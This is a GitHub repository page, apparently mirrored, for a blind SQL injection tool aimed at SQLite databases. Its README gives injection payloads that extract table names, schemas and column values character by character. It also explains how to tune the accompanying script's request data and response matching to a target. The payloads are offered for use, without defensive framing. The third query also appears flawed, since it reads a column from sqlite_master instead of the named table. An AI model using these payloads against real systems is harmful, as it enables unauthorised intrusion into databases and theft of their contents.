Movatterモバイル変換


[0]ホーム

URL:


Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

This is a repository about blind sql injection for sqlite database.

License

NotificationsYou must be signed in to change notification settings

aykutcanustun/SQLiteBLINDInjection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

How To Set Queries:

To retrieve table names from database:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),{},1)){} {} --

To retrieve table schema:
' or UNICODE(SUBSTR((SELECT sql FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --

To retrieve values inside column:
' or UNICODE(SUBSTR((SELECT $COLUMN_NAME FROM sqlite_master WHERE tbl_name='$TABLE_NAME'),{},1)){} {} --

Replace $TABLE_NAME and $COLUMN_NAME with data that you retrieved from privious query!

How To Set Varibles:

To use the script, you have to set varibles according to your request's header, data and response etc.
I marked these lines with comments in main.py!
Make changes at these lines:
replacements
Replace "username" string with your request's data as below:
request
You have to make this request manually to see what is the response:
' or UNICODE(SUBSTR((SELECT name FROM sqlite_master WHERE type='table'),1,1)) < 128 --
And replace "Data Sent!" string according to your manual request's reply:
response

About

This is a repository about blind sql injection for sqlite database.

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages


[8]ページ先頭

©2009-2025 Movatter.jp